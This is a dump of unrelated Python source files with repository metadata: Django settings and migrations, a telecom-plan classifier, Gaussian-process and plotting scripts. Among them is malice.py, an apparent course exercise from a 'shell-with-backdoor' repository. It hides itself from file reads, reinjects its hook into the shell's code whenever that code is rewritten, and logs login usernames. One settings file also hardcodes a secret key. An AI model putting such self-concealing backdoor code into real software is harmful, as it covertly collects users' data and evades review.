]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'pool.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'pool.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
| [
"erkinbek1997@gmail.com"
] | erkinbek1997@gmail.com |
d493951f15a13b2c7e58f13b6897fc943739bfe2 | 2e4aa514b8e6843011256e7fb2e004b42f552cd1 | /market/migrations/0002_auto_20200416_1611.py | bca5820983abb415d77f6e36804e851217970267 | [] | no_license | seungw0n/project_COMP307 | 211dcafdab220f67449149af629f46df0ee77378 | 8109d123cb97bedc54df2e1ba0eaa39d55cf38e8 | refs/heads/master | 2022-04-20T17:18:50.378846 | 2020-04-22T17:30:11 | 2020-04-22T17:30:11 | 253,855,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,087 | py | # Generated by Django 3.0.5 on 2020-04-16 16:11
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import market.models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('market', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='product',
name='owner',
field=models.ForeignKey(default='1', on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='product',
name='description',
field=models.TextField(max_length=10000),
),
migrations.AlterField(
model_name='product',
name='image_url',
field=models.FileField(upload_to=market.models.get_upload_path),
),
migrations.AlterField(
model_name='product',
name='price',
field=models.IntegerField(),
),
]
| [
"vic.massenet99@gmail.com"
] | vic.massenet99@gmail.com |
239f4a8b11fc2bda9b29eb6a67b0887922b33e8e | 6cb1b63846e818255945cdf1e8faf4f3e353c735 | /venv/datafountain/taocan/ml_models.py | ed7cf0cae6f0c7603916557230a8865a64c2658d | [] | no_license | LuckyHandsomeCat/deep_learning | 3eb2bec1133f8e547436a8625b40e8bfa8bc7572 | 8c37912069a06a58f80034fe1be7ba5fbc0865d4 | refs/heads/master | 2020-08-08T02:50:10.278517 | 2018-11-30T11:11:34 | 2018-11-30T11:11:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,793 | py | #!/usr/bin/env python3
# -*-coding:utf8 -*-
# @TIME :2018/10/15 上午11:28
# @Author :hwwu
# @File :ml_models.py
import pandas as pd
import numpy as np
path = '/Users/liyangyang/Downloads/datafountain/taocan/'
###service_type,is_mix_service,online_time,1_total_fee,2_total_fee,3_total_fee,4_total_fee,
# month_traffic,many_over_bill,contract_type,contract_time,is_promise_low_consume,net_service,
# pay_times,pay_num,last_month_traffic,local_trafffic_month,local_caller_time,service1_caller_time,
# service2_caller_time,gender,age,complaint_level,former_complaint_num,former_complaint_fee,
# current_service,user_id
def getdata(data, f=True):
# data = pd.read_csv(path + 'train_all.csv')
if f:
data.loc[data['current_service'] == 90063345, 'current_service'] = 0
data.loc[data['current_service'] == 89950166, 'current_service'] = 1
data.loc[data['current_service'] == 89950167, 'current_service'] = 2
data.loc[data['current_service'] == 99999828, 'current_service'] = 3
data.loc[data['current_service'] == 90109916, 'current_service'] = 4
data.loc[data['current_service'] == 89950168, 'current_service'] = 5
data.loc[data['current_service'] == 99999827, 'current_service'] = 6
data.loc[data['current_service'] == 99999826, 'current_service'] = 7
data.loc[data['current_service'] == 90155946, 'current_service'] = 8
data.loc[data['current_service'] == 99999830, 'current_service'] = 9
data.loc[data['current_service'] == 99999825, 'current_service'] = 10
data.loc[data['age'] == '\\N', 'age'] = 0
data.loc[data['gender'] == '\\N', 'gender'] = 0
data['age'] = data['age'].astype('int64')
data.loc[data['age'] < 20, 'age'] = 0
data.loc[(data['age'] >= 20) & (data['age'] < 30), 'age'] = 1
data.loc[(data['age'] >= 30) & (data['age'] < 40), 'age'] = 2
data.loc[(data['age'] >= 40) & (data['age'] < 50), 'age'] = 3
data.loc[data['age'] >= 50, 'age'] = 4
data['gender'] = data['gender'].astype('int64')
data.loc[data['2_total_fee'] == '\\N', '2_total_fee'] = 0.0
data.loc[data['3_total_fee'] == '\\N', '3_total_fee'] = 0.0
data['2_total_fee'] = data['2_total_fee'].astype('float64')
data['3_total_fee'] = data['3_total_fee'].astype('float64')
data.loc[data['1_total_fee'] > 500.0, '1_total_fee'] = 500.0
data.loc[data['2_total_fee'] > 500.0, '2_total_fee'] = 500.0
data.loc[data['3_total_fee'] > 500.0, '3_total_fee'] = 500.0
data.loc[data['4_total_fee'] > 500.0, '4_total_fee'] = 500.0
data['total_fee'] = 0
data.loc[data['1_total_fee'] < .0, 'total_fee'] = 1
data.loc[data['2_total_fee'] < .0, 'total_fee'] = 1
data.loc[data['3_total_fee'] < .0, 'total_fee'] = 1
data.loc[data['4_total_fee'] < .0, 'total_fee'] = 1
data.loc[data['1_total_fee'] > 499.0, 'total_fee'] = 2
data.loc[data['2_total_fee'] > 499.0, 'total_fee'] = 2
data.loc[data['3_total_fee'] > 499.0, 'total_fee'] = 2
data.loc[data['4_total_fee'] > 499.0, 'total_fee'] = 2
data['month_traffic_0'] = 0
data.loc[(data['month_traffic'] > 0) & (data['month_traffic'] < 1024), 'month_traffic_0'] = 1
data.loc[data['month_traffic'] == 1024.0, 'month_traffic_0'] = 2
data.loc[data['month_traffic'] > 1024, 'month_traffic_0'] = 3
data.loc[data['online_time'] > 140, 'online_time'] = 140
data['pay_ave'] = data['pay_num'] / data['pay_times']
data.loc[data['pay_times'] > 10, 'pay_times'] = 10
data['my_traffic'] = data['last_month_traffic'].apply(lambda x: parse_traffic(x))
data = data.drop(['local_trafffic_month'], axis=1)
data = data.drop(['last_month_traffic'], axis=1)
data = data.drop(['month_traffic'], axis=1)
data.loc[data['local_caller_time'] == 0.0, 'local_caller_time'] = 0
data.loc[(data['local_caller_time'] > 0) & (data['local_caller_time'] < 10), 'local_caller_time'] = 1
data.loc[(data['local_caller_time'] >= 10) & (data['local_caller_time'] < 100), 'local_caller_time'] = 2
data.loc[data['local_caller_time'] >= 100, 'local_caller_time'] = 3
data.loc[data['service1_caller_time'] == 0.0, 'service1_caller_time'] = 0
data.loc[(data['service1_caller_time'] > 0) & (data['service1_caller_time'] < 10), 'service1_caller_time'] = 1
data.loc[(data['service1_caller_time'] >= 10) & (data['service1_caller_time'] < 100), 'service1_caller_time'] = 2
data.loc[data['service1_caller_time'] >= 100, 'service1_caller_time'] = 3
data.loc[data['service2_caller_time'] == 0.0, 'service2_caller_time'] = 0
data.loc[(data['service2_caller_time'] > 0) & (data['service2_caller_time'] < 10), 'service2_caller_time'] = 1
data.loc[(data['service2_caller_time'] >= 10) & (data['service2_caller_time'] < 100), 'service2_caller_time'] = 2
data.loc[data['service2_caller_time'] >= 100, 'service2_caller_time'] = 3
data['complaint_num'] = 0
data.loc[data['former_complaint_num'] > 0, 'complaint_num'] = 1
data['complaint_fee'] = 0
data.loc[data['former_complaint_fee'] > 0, 'complaint_fee'] = 1
return data
def parse_traffic(x):
m = x / 1024.0
if m == 0.0:
return 0
elif m < 1.0:
return 0.5
elif m == 1.0:
return 1
elif m < 2.0:
return 1.5
elif m == 2.0:
return 2
elif m < 3.0:
return 2.5
elif m == 3.0:
return 3
elif m < 4.0:
return 3.5
elif m == 4.0:
return 4
else:
return 5
data = pd.read_csv(path + 'train_all.csv')
data = getdata(data)
train_data = data
train_x = train_data.drop(['user_id', 'current_service'], axis=1)
train_y = train_data['current_service']
####### test数据
republish_test_data = pd.read_csv(path + 'republish_test.csv')
republish_test_data = getdata(republish_test_data, f=False)
# print('republish_test_data: ', republish_test_data.shape)
user_id = republish_test_data['user_id']
republish_test = republish_test_data.drop(['user_id'], axis=1)
from sklearn.model_selection import train_test_split
Y_CAT = pd.Categorical(train_y)
X_train, X_test, y_train, y_test = train_test_split(train_x, Y_CAT.codes, test_size=0.05, random_state=666)
y_test = np.array(y_test)
def score(y_pred):
y_pred = [list(x).index(max(x)) for x in y_pred]
count = 0
for i in range(len(y_pred)):
# print(test_y[i:i+1][0])
if (y_pred[i] == y_test[i:i + 1][0]):
# print(y_pred[i], test_y[i:i + 1][0])
count += 1
print(count, len(y_pred), count / len(y_pred))
from sklearn.naive_bayes import MultinomialNB
from sklearn.model_selection import cross_val_score
# clf = MultinomialNB()
# clf.fit(X_train, y_train)
# print("多项式贝叶斯分类器20折交叉验证得分: ", np.mean(cross_val_score(clf, X_train, y_train, cv=10, scoring='accuracy')))
# score(clf.predict(X_test))
#
from sklearn import svm
lin_clf = svm.LinearSVC(class_weight='balanced')
lin_clf.fit(X_train, y_train)
print("svm分类器20折交叉验证得分: ", np.mean(cross_val_score(lin_clf, X_train, y_train, cv=5, scoring='accuracy')))
score(lin_clf.predict(X_test))
from sklearn.ensemble import RandomForestClassifier
lin_forest = RandomForestClassifier(n_estimators=10, random_state=1, class_weight='balanced')
lin_forest.fit(X_train, y_train)
print("RandomForestClassifier分类器20折交叉验证得分: ",
np.mean(cross_val_score(lin_forest, X_train, y_train, cv=5, scoring='accuracy')))
score(lin_forest.predict(X_test))
import xgboost as xgb
model_xgb = xgb.XGBClassifier(colsample_bytree=0.4603, gamma=0.0468)
model_xgb.fit(X_train, y_train)
print("model_xgb分类器20折交叉验证得分: ",
np.mean(cross_val_score(model_xgb, X_train, y_train, cv=5, scoring='accuracy')))
score(model_xgb.predict(X_test))
| [
"wuhongwei@videopls.com"
] | wuhongwei@videopls.com |
4f89fddc1994f8f11802784f278c35143f8c2b33 | 0e96b335079815d176e96cf6e903f899f3ade24f | /Ecommerce-site1/site1/site1/settings.py | 238ec779cf65615e8f9a2766436b0b94f18c6dce | [] | no_license | sudarshannkarki/sda-project | ad2c0a1bed410754b078a53936ff8c11f9f4b26a | b2b17296269028149131ce273d098f575d8cf260 | refs/heads/master | 2022-12-18T14:46:19.429488 | 2020-09-29T11:31:50 | 2020-09-29T11:31:50 | 293,024,887 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,253 | py | """
Django settings for site1 project.
Generated by 'django-admin startproject' using Django 3.0.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'riv&vbe-m#4=k(oho53xbhuhrh&w_+7f9i4gddjjh!w4+=ol7p'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'store.apps.StoreConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'site1.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'site1.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
MEDIA_URL = '/images/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'static/images')
| [
"sudarshannkarki@gmail.com"
] | sudarshannkarki@gmail.com |
cbc6d79ace032603f09724dedb78052bbba46e8d | 0bd8c70bb9ef58fb3d74bf1505f4c81614e5006a | /malice.py | 93fe3bbee55f11174e78be5e4f3bd079d9365b0b | [] | no_license | stevenrkeyes/shell-with-backdoor | 24944226c202ea3f4463f2fa597861e5192dca9e | 7d04d4a968171a8df044378fcd6eeb75ba2fdaa8 | refs/heads/master | 2021-01-22T09:27:31.728301 | 2015-05-08T05:07:12 | 2015-05-08T05:07:12 | 35,215,611 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,885 | py | import errno
import os.path
import shlex
import subprocess
import sys
import urllib2
def read_file(filename):
with open(filename, 'r') as fd:
# if it's the shell code file itself, return the shell code minus the
# malicious line (the import)
if filename == "shell.py":
return fd.read().replace("execfile('malice.py')\n", "")
# throw an error if it's one of the malicious files (username.txt or this file)
elif filename in ["malice.py", "usernames.txt"]:
raise IOError
else:
return fd.read()
def write_code(new_code):
code_file = __file__
print __file__
new_new_code = new_code
insertion = "execfile('malice.py')\n"
new_new_code = insert_after_function(new_new_code, "read_file", insertion)
new_new_code = insert_after_function(new_new_code, "write_code", insertion)
new_new_code = insert_after_function(new_new_code, "login", insertion)
with open(code_file, 'w') as code_fd:
code_fd.write(new_new_code)
# for a text of a python file, insert some text after some function
def insert_after_function(file_text, function_name, insertion):
function_start = file_text.find("def " + function_name)
# this will find the line that starts the next function
# though this would be better with regex and finding newlines followed by
# anything except spaces / tabs / more newlines
function_end = file_text.find("\nd", function_start)
new_file_text = file_text[:function_end] + insertion + file_text[function_end:]
return new_file_text
username = None
def login(args):
if len(args) != 1:
raise CommandError("Usage: login username")
global username
if username:
raise CommandError("Already logged in.")
username = args[0]
f = open("usernames.txt", "a")
f.write(username + "\n")
f.close()
| [
"srkeyes@mit.edu"
] | srkeyes@mit.edu |
bc668bc1262627c4914d58c1905b1b56f82fe32b | 1d0f1258cdaadd2514ecb53a8d479dcc488d22d7 | /v0712.py | 7e1fcdae0f3c2bfbeb1a146336601fcbd1bee141 | [] | no_license | yangwei07/pymc3_mcmc | 92905eec5cca3b8c7a0c1ac552edc203a2b2475d | 6bd6f47158ea3fc2844aac56d57a4fef20187885 | refs/heads/master | 2020-05-23T21:02:15.812903 | 2019-08-05T19:22:11 | 2019-08-05T19:22:11 | 186,943,515 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,307 | py | import numpy as np
# from scipy.interpolate import spline
from scipy.linalg import cho_solve
from numpy.linalg import cholesky
from itertools import cycle
import pandas as pd
import matplotlib.pyplot as plt
class SimpleGP():
""" One dimensional Gaussian Process class. Uses
squared exponential covariance form.
parameters
----------
width_scale : float, positive
Same as sigma in (4) of post
length_scale : float, positive
Same as l in (4) of post
noise : float
Added to diagonal of covariance, useful for
improving convergence
"""
def __init__(self, width_scale, length_scale, noise=10 ** (-6)):
self.width_scale = width_scale
self.length_scale = length_scale
self.noise = noise
def _exponential_cov(self, x1, x2):
"""
Return covariance matrix for two arrays,
with i-j element = cov(x_1i, x_2j).
parameters
----------
x1, x2: np.array
arrays containing x locations
"""
return (self.width_scale ** 2) * np.exp(
- np.subtract.outer(x1, x2) ** 2 / (2 * self.length_scale ** 2))
def fit(self, sample_x, sample_y, sample_s):
"""
Save for later use the Cholesky matrix
associated with the inverse that appears
in (5) of post. Also evaluate the weighted
y vector that appears in that equation.
parameters
----------
sample_x : np.array
locations where we have sampled
sample_y : np.array
y values observed at each sample location
sample_s : np.array
array of stds for each sample
"""
self.sample_x = np.array(sample_x)
S = self._exponential_cov(sample_x, sample_x)
d = np.diag(np.array(sample_s) ** 2 + self.noise)
self.lower_cholesky = cholesky(S + d)
self.weighted_sample_y = cho_solve(
(self.lower_cholesky, True), sample_y)
def interval(self, test_x):
"""
Obtain the one-sigam confidence interval
for a set of test points
parameters
----------
test_x : np.array
locations where we want to test
"""
test_x = np.array([test_x]).flatten()
means, stds = [], []
for row in test_x:
S0 = self._exponential_cov(row, self.sample_x)
v = cho_solve((self.lower_cholesky, True), S0)
means.append(np.dot(S0, self.weighted_sample_y))
stds.append(np.sqrt(self.width_scale ** 2 - np.dot(S0, v)))
return means, stds
def sample(self, test_x, samples=1):
"""
Obtain function samples from the posterior
parameters
----------
test_x : np.array
locations where we want to test
samples : int
Number of samples to take
"""
S0 = self._exponential_cov(test_x, self.sample_x)
# construct covariance matrix of sampled points.
m = []
for row in S0:
m.append(cho_solve((self.lower_cholesky, True), row))
cov = self._exponential_cov(test_x, test_x) - np.dot(S0, np.array(m).T)
mean = np.dot(S0, self.weighted_sample_y)
return np.random.multivariate_normal(mean, cov, samples)
def smooth(data, window):
out0 = np.convolve(data, np.ones(window, dtype=int), 'valid') / window
r = np.arange(1, window - 1, 2)
start = np.cumsum(data[:window - 1])[::2] / r
stop = (np.cumsum(data[:-window:-1])[::2] / r)[::-1]
return np.concatenate(( start , out0, stop ))
# Insert data here.
data = pd.read_csv('./UAH/D1/20151110175712-16km-D1-NORMAL1-SECONDARY/RAW_GPS.txt',
sep='\s+', names=['time', 'speed'], usecols=[0, 1])
time = np.arange(10, 600, 0.1)
speed = np.interp(time, data['time'], data['speed'])
DURATION = 500
PREDICTION = 50
WIDTH_SCALE = 10
LENGTH_SCALE = 5
SAMPLES = 20
colors = cycle(['g', 'b', 'k', 'y', 'c', 'r', 'm'])
fig = plt.figure()
model = SimpleGP(WIDTH_SCALE, LENGTH_SCALE)
for i in range(10):
ix = np.arange(i * DURATION, (i + 1) * DURATION + 1, PREDICTION)
num = len(ix)
sample_x = time[ix]
sample_y = speed[ix] - np.mean(speed[ix])
sample_s = 0.1 * np.random.rand(num) * np.ones_like(sample_x)
m_speed = np.mean(speed[ix])
model.fit(sample_x, sample_y, sample_s)
test_x = np.arange(sample_x[0], sample_x[-1] + 5, .1)
means, stds = model.interval(test_x)
samples = model.sample(test_x, SAMPLES)
# plots here.
# ax = fig.add_subplot(511+i)
plt.errorbar(test_x, means + m_speed, yerr=stds,
ecolor='g', linewidth=1.5,
elinewidth=0.5, alpha=0.75)
for sample, c in zip(samples, colors):
plt.plot(test_x, sample + m_speed, c, linewidth=2. * np.random.rand(), alpha=0.5)
plt.plot([sample_x[0], sample_x[0]], [np.min(sample_y + m_speed), np.max(sample_y + m_speed)], c='r', ls='--')
plt.plot([sample_x[-1], sample_x[-1]], [np.min(sample_y + m_speed), np.max(sample_y + m_speed)], c='r', ls='--')
ix = np.arange(i * DURATION, (i + 1) * DURATION + PREDICTION, PREDICTION)
real_x = time[ix]
real_y = speed[ix]
real_y = smooth(real_y, 3)
plt.plot(real_x, real_y, c='b', linewidth=2) | [
"yangwei0705@gmail.com"
] | yangwei0705@gmail.com |
666073459ed0ddc9addc536eaef21ca68580cbb7 | 4bcbb6a73e00acb0c08d709f71d13a5e563076ca | /plot.py | 8e6fdbeaf0c0159445e2d0821cc27bf1505219c0 | [] | no_license | WellJoea/MLSurvival | 1ec89af7b11fdb294f59a7600dfc5f669e275068 | 55a5431bbcf61e2da262a7f612a83fb43276a0ab | refs/heads/master | 2020-08-02T03:48:26.816226 | 2019-09-27T03:06:37 | 2019-09-27T03:06:37 | 200,193,562 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,339 | py |
from sklearn.metrics import roc_curve, precision_recall_curve, auc, average_precision_score, accuracy_score
from sklearn.preprocessing import label_binarize
from sklearn.linear_model import Ridge, Lasso
from statsmodels.stats.outliers_influence import variance_inflation_factor
#import scikitplot as skplt
import pandas as pd
import numpy as np
np.set_printoptions(threshold=np.inf)
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib.patches import Patch
from matplotlib.lines import Line2D
from matplotlib.backends.backend_pdf import PdfPages
import seaborn as sns
import fastcluster
import os
def opens(group):
group = pd.read_csv(group, header=0, encoding='utf-8', sep='\t').fillna(np.nan)
AYa = group[(group.Group == 'Y') | (group.Group.str.contains('S_')) ].Variables.tolist()
RYa = group[(group.Group == 'Y') & (group.Type =='R') ].Variables.tolist()
CYa = group[(group.Group == 'Y') & (group.Type =='C') ].Variables.tolist()
Sya = group[(group.Group.str.contains('S_')) & (group.Type.isin( ['S', 'T']))]
Xa = group[(group.Group != 'Y') & ~(group.Group.str.contains('S_')) ].Variables.tolist()
Xg = group[(group.Group != 'Y') & ~(group.Group.str.contains('S_')) ][['Variables','Group']]
Xg.set_index('Variables', inplace=True)
SYa = pd.DataFrame([],columns=['T','S'])
for i, j in Sya.iterrows():
SYa.loc[ j.Group , j.Type ] = j.Variables
return Xg
#return (group, AYa, RYa, CYa, SYa, Xa, Xg)
class Baseset():
def __init__(self, outfile, *array, **dicts):
self.out = outfile
os.system('mkdir -p '+ os.path.dirname(self.out))
self.array = array
self.dicts = dicts
self.color_ = ['#009E73', '#FF2121', '#00C5CD', '#6600CC', '#E7A72D', '#EE7AE9',
'#B2DF8A', '#CAB2D6', '#B97B3D', '#0072B2', '#FFCC00', '#0000FF',
'#8E8E38', '#6187C4', '#FDBF6F', '#666666', '#33A02C', '#FB9A99',
'#D9D9D9', '#FF7F00', '#1F78B4', '#FFFFB3', '#5DADE2', '#95A5A6',
'#FCCDE5', '#FB8072', '#B3DE69', '#F0ECD7', '#CC66CC', '#A473AE',
'#FF0000', '#EE7777', '#ED5401']
self.linestyle_= [ ':', '--', '-.']
self.markertyle_ = ['X', 'P', '*', 'v', 's','o','^']
font = {#'family' : 'normal',
'weight' : 'normal',
'size' : 14}
plt.rc('font', **font)
plt.figure(figsize=(10,10))
plt.margins(0,0)
plt.rcParams.update({'figure.max_open_warning': 1000})
sns.set(font_scale=1)
#plt.rc('xtick', labelsize=20)
#plt.rc('ytick', labelsize=20)
#plt.rcParams['font.size'] = 23
#plt.rcParams.update({'font.size': 22})
#plt.rcParams['legend.fontsize'] = 'large'
#plt.rcParams['figure.titlesize'] = 'medium'
class MPlot(Baseset):
def Feature_Coefs(self, All_coefs_):
plt.figure(figsize=(13,10))
color_ = self.color_*All_coefs_.shape[0]
linestyle_ = self.linestyle_*All_coefs_.shape[0]
markertyle_ = self.markertyle_*All_coefs_.shape[0]
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(20,10), gridspec_kw={'wspace': 0.1}, sharex=True)
fig.suptitle('coefs_ importance ROC Accuracy', x=0.5 )
fig.subplots_adjust(0.05,0.2,0.87,0.95)
fig.text(0.45, 0.03, '%s featrues'%All_coefs_.shape[0] , ha='center', va='center')
for x,y,z in zip(['coef_', 'exp(coef_)' ], [ax1, ax2], [ 'coefficients', 'hazard ratio'] ):
coefs_df = All_coefs_.filter( regex=r'^%s(\.[0-9]+)?$'%x, axis=1 )
if x == 'exp(coef_)':
coefs_df = All_coefs_.filter( regex=r'exp\(coef_\)(\.[0-9]+)?$', axis=1 )
for i,j in enumerate(coefs_df.columns):
y.plot( coefs_df[j],
marker=markertyle_[i],
markersize=3.2,
color=color_[i],
linestyle=linestyle_[i],
lw=1.0, label='')
y.plot(All_coefs_['%s_mean'%x] , 'k-.', lw=1.5, label='mean_coef_',alpha= 0.9 )
y.plot(All_coefs_['%s_median'%x], 'k--', lw=1.0, label='median_coef_',alpha= 0.5 )
y.fill_between( All_coefs_.index,
All_coefs_['%s_mean'%x]-1*All_coefs_['%s_std'%x],
All_coefs_['%s_mean'%x]+1*All_coefs_['%s_std'%x],
color='grey', alpha=0.3, label=r'$\pm$ 1 std. dev.')
if x == 'exp(coef_)':
y.plot(All_coefs_['exp(coef_mean)'], 'k:', lw=1.0, label='exp(coef_mean)',alpha= 0.5 )
y.set_ylabel(x)
#y.set_xlabel('%s featrues'%All_coefs_.shape[0])
y.set_xticklabels( All_coefs_.index, rotation='270')
legend_elements=[ Line2D([0], [0], color=color_[0], marker=markertyle_[0], linestyle=linestyle_[0], markersize=3.2, lw=1, label='CV times'),
Line2D([0], [0], color='k', linestyle='-.', lw=1.5, alpha= 0.9, label='coef_/exp(coef_) mean'),
Line2D([0], [0], color='k', linestyle='--', lw=1.0, alpha= 0.5, label='coef_/exp(coef_) median'),
Line2D([0], [0], color='k', linestyle=':' , lw=1.0, alpha= 0.5, label='exp(coef_mean)'),
Patch(facecolor='grey', edgecolor='black' , alpha=0.3, label=r'$\pm$ 1 std. dev.')
]
leg = plt.legend(handles=legend_elements,
title='Features',
numpoints=1,
bbox_to_anchor=(1.0, 0.5),
prop={'size':11}, loc='center left')
plt.savefig( self.out, bbox_extra_artists=(leg,) ) # , bbox_inches='tight')
plt.close()
    def Feature_Import_box(self, All_coefs_, Xg, label, Y_name, Model, sort_by_group=True):
        """Box-plot per-feature coefficient importance across CV repeats.

        ``All_coefs_`` holds one column per CV repeat (``coef_``, ``coef_.1``,
        ...) plus ``<label>_mean`` / ``<label>_median`` / ``<label>_std``
        summary columns; ``Xg`` must provide a ``Group`` column used to
        colour each feature's box.  The figure is written to ``self.out``;
        nothing is returned.
        """
        # Keep only the columns belonging to the requested importance metric.
        All_import = All_coefs_.filter( regex=r'^%s.*'%label, axis=1 )
        # Repeat the style cycles so there are enough entries for every feature.
        color_ = self.color_*All_import.shape[0]
        linestyle_ = self.linestyle_*All_import.shape[0]
        markertyle_ = self.markertyle_*All_import.shape[0]
        # Inner-join the group annotation; features missing from Xg are dropped.
        All_import = pd.concat([All_import, Xg[['Group']]],axis=1, join='inner', sort=False)
        Xg_cor = All_import.Group.unique()
        # One colour per feature group.
        cor_dict = dict(zip(Xg_cor, color_[:len(Xg_cor)]))
        All_import['ColorsX'] = All_import.Group.map(cor_dict)
        if sort_by_group:
            All_import.sort_values(by=['Group', label+'_median', label+'_mean'], ascending=[True, False, False], inplace=True, axis=0)
        # Edge colours encode the sign of the per-feature median importance.
        color_a = ['red' if i >= 0 else 'blue' for i in All_import[label+'_median']]
        color_b = ['red' if i < 0 else 'blue' for i in All_import[label+'_median']]
        color_c = All_import['ColorsX'].to_list()
        # NOTE(review): the next assignment is dead code — it is overwritten
        # immediately below.
        All_raw = All_import[label]
        All_raw = All_import.filter( regex=r'^%s(\.[0-9]+)?$'%label, axis=1 )
        if label == 'exp(coef_)':
            # The '(' in this label breaks the generic regex above, so the
            # pattern is rebuilt with the parentheses escaped.
            All_raw = All_import.filter( regex=r'exp\(coef_\)(\.[0-9]+)?$', axis=1 )
        print(All_raw.head())
        column = sorted(set(All_raw.columns))
        X_labels = All_raw.index.to_list()
        # +/- 1 standard-deviation band around the mean importance.
        Y_sd_min = All_import[label+'_mean'] - 1*All_import[label+'_std']
        Y_sd_max = All_import[label+'_mean'] + 1*All_import[label+'_std']
        #plt.plot(All_import['0_mean'], 'k-.', lw=1.5, label='mean_import', alpha=0.9)
        plt.figure(figsize=(13,10))
        plt.fill_between( X_labels, Y_sd_min, Y_sd_max,
                            color='grey', alpha=0.3, label=r'$\pm$ 1 std. dev.')
        # One legend patch per feature group, plus sign/std-dev explanations.
        legend_elements=[ Patch(facecolor=cor_dict[g], edgecolor='r', label=g) for g in sorted(cor_dict.keys()) ]
        if All_import[label+'_median'].min() <0:
            legend_elements.append(Patch(facecolor='white', edgecolor='blue', label=r'coefs_ $\geq$0') )
            legend_elements.append(Patch(facecolor='white', edgecolor='red' , label=r'coefs_ <0') )
        legend_elements.append(Patch(facecolor='grey', edgecolor='black' , alpha=0.3, label=r'$\pm$ 1 std. dev.') )
        ncol_ = 1 if len(legend_elements) <=6 else 2
        bplot =plt.boxplot(All_raw,
                    patch_artist=True,
                    vert=True,
                    labels=X_labels,
                    notch=0,
                    positions=range(len(X_labels)),
                    meanline=True,
